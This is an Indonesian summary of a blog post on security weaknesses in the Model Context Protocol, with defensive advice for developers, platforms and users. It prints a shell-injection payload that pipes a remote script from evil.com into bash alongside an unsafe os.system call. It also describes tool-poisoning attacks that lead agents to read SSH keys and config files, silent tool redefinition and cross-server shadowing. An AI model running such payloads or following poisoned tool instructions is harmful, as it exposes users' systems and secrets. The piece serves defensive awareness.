Huruf “S” dalam MCP Berarti Keamanan
(medium.com/@elenacross7)- Model Context Protocol(MCP) sedang menarik perhatian sebagai standar yang menghubungkan agen LLM seperti Claude, GPT, dan Cursor ke tool dan data, tetapi model keamanan bawaannya lemah sehingga adopsinya sendiri dapat memperluas permukaan serangan
- Meski koneksi API standar, sesi persisten, eksekusi perintah, dan berbagi konteks menjadi lebih mudah, koneksi ke server sembarang dapat menjadi jalur pintas menuju shell, secret, dan infrastruktur
- Dalam pengujian Equixly, lebih dari 43% implementasi server MCP memuat pemanggilan shell yang tidak aman, dan Invariant Labs membahas Tool Poisoning Attack yang menyembunyikan instruksi berbahaya di dalam deskripsi tool
- MCP kekurangan standar autentikasi, enkripsi konteks, dan verifikasi integritas tool; pengguna juga sulit melihat seluruh instruksi tool yang sebenarnya dibaca oleh agen
- Developer perlu melakukan validasi input dan mengunci versi; platform perlu menampilkan metadata dan hash integritas; pengguna perlu memantau koneksi ke server sembarang serta pembaruan tool yang tidak terduga
Mengapa MCP Menjadi Permukaan Serangan
- MCP(Model Context Protocol) adalah standar baru untuk cara LLM terintegrasi dengan tool dan data, dan disebut sebagai “USB-C untuk agen AI”
- Melalui MCP, agen dapat menangani berbagai pekerjaan dengan cara yang terstandarisasi
- Terhubung ke tool melalui API terstandarisasi
- Mempertahankan sesi persisten
- Menjalankan perintah
- Berbagi konteks antar-workflow
- Masalah utamanya adalah MCP tidak menyediakan model keamanan bawaan
- Jika agen dihubungkan ke server MCP sembarang, bisa muncul side channel menuju shell, secret, dan infrastruktur
Metode Serangan yang Disebutkan Secara Nyata
-
Kerentanan command injection
- Dalam pengujian Equixly, lebih dari 43% implementasi server MCP memuat pemanggilan shell yang tidak aman
- Contoh kode langsung menggabungkan input pengguna ke perintah shell, seperti
os.system("notify-send " + notification_info['msg']) - Jika penyerang memasukkan payload seperti
"; curl evil.sh | bash"ke parameter tool MCP, eksekusi kode jarak jauh dapat terjadi melalui agen tepercaya
-
Tool Poisoning Attack
- Serangan yang dibahas Invariant Labs menyembunyikan instruksi berbahaya di dalam deskripsi tool MCP
- Deskripsi ini tidak terlihat oleh pengguna, tetapi tetap terekspos apa adanya kepada AI
- Contoh tool terlihat seperti fungsi untuk menjumlahkan dua angka, tetapi di dalam deskripsinya memuat instruksi untuk membaca
~/.ssh/id_rsadan~/.cursor/mcp.json - Agen seperti Cursor dapat mengikuti instruksi semacam ini
-
Silent Redefinition
- Tool MCP dapat mengubah definisinya sendiri setelah dipasang
- Meskipun pengguna pada hari pertama menyetujui tool yang terlihat aman, tool itu kemudian dapat berubah diam-diam untuk mengirim API key ke penyerang
- Ini dapat dilihat sebagai masalah supply chain yang masuk ke dalam LLM
-
Cross-Server Tool Shadowing
- Jika beberapa server terhubung ke agen yang sama, server berbahaya dapat menimpa atau mencegat panggilan yang ditujukan ke server tepercaya
- Dampak yang mungkin terjadi antara lain
- Mengirim email yang tampak dikirim ke pengguna, tetapi sebenarnya dikirim ke penyerang
- Menyisipkan logika tersembunyi ke tool yang tidak terkait
- Mengenkode eksfiltrasi data melalui argumen yang sulit terlihat
Mekanisme Keamanan yang Hilang dan Respons per Peran
- Prioritas MCP saat ini lebih dekat ke integrasi yang mudah dan antarmuka terpadu, sementara fitur keamanan berikut masih kurang
- Tidak ada standar autentikasi
- Tidak ada enkripsi konteks
- Tidak ada metode verifikasi integritas tool
- Pengguna tidak dapat memeriksa seluruh instruksi tool yang dilihat agen, dan tidak ada mekanisme untuk memverifikasi bahwa “tool ini belum dimodifikasi”
-
Developer
- Menggunakan validasi input
- Mengunci versi server dan tool MCP
- Membersihkan deskripsi tool
-
Pembuat platform
- Menampilkan seluruh metadata tool
- Menggunakan hash integritas untuk pembaruan server
- Mewajibkan keamanan sesi
-
Pengguna
- Tidak terhubung ke server sembarang
- Memantau perilaku sesi seperti log produksi
- Mengawasi pembaruan tool yang tidak terduga
Konsep ScanMCP.com
- ScanMCP.com dapat berisi scanner dan dashboard untuk mengaudit tool MCP yang terhubung
- Hal yang ditampilkan mencakup
- Risiko seperti RCE, kontaminasi tool, dan kebocoran sesi
- Perbedaan antara informasi yang dilihat pengguna dan informasi yang dilihat agen
- Sasaran yang cocok adalah tim keamanan platform agen, startup infrastruktur AI, dan pembuat tool independen yang mengutamakan kepercayaan
- MCP memang kuat, tetapi sampai protokol keamanan bawaan tersedia, diperlukan tool yang menyediakan visibilitas dan kontrol
Belum ada komentar.